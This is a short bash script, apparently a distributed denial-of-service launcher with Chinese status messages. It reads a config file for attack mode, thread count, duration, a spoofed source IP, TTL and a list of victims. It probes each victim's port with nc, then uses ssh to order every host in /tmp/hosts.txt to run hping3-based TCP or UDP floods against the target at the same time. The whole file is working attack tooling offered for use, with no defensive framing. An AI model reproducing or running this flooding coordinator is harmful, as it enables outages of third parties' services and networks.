#!/bin/bash

addhost 2>/dev/null

if [[ $1 = "" ]] 
then
    echo -e "Usage: attack 'configfile.txt'"
    echo -e "example:\n\tattack config.txt"
	exit
fi

tcnt=$(wc -l $1|awk '{print $1}')
if [ 14 -gt $tcnt ]
then
	echo -e "未设置目标.\n"
	exit
fi

declare -a HOSTS=($(cat /tmp/hosts.txt))
cnt=${#HOSTS[@]}
mode=$(sed -n "6p" $1|awk '{print $2}')
thread=$(sed -n "8p" $1|awk '{print $2}')
attack_time=$(sed -n "10p" $1|awk '{print $2}')
wait_time=$(sed -n "12p" $1|awk '{print $2}')
source_ip=$(sed -n "14p" $1|awk '{print $2}')
ttl=$(sed -n "16p" $1|awk '{print $2}')
victim=$(sed -n "18p" $1|awk '{print $0}')

#echo $1 $thread $attack_time $wait_time $source_ip $ttl $victim

for i in $(seq 18 1 $tcnt)
do
	victim=$(sed -n "$i {p;q;}" $1|awk '{print $0}')
        nc -z -w $wait_time $victim
        if [ $? -eq "0" ]
        then
		for ((k=0;k<cnt;k++))
		do
			echo -e "正在攻击 $victim\n"
			if [ $mode = "udp" ]
			then
				echo "???"
    				ssh ${HOSTS[k]} hping3u-client $victim $attack_time $ttl $thread $source_ip &
			else
    				ssh ${HOSTS[k]} hping3-client $victim $attack_time $ttl $thread $source_ip &
#    			echo "ssh ${HOSTS[k]} hping3-client $victim $attack_time $ttl $thread $source_ip &"
			fi
		done
	else
		echo -e "\n$victim 端口未开放或者被防火墙屏蔽.\n"
		attack_time=0
        fi
	sleep $(($attack_time+3))
done
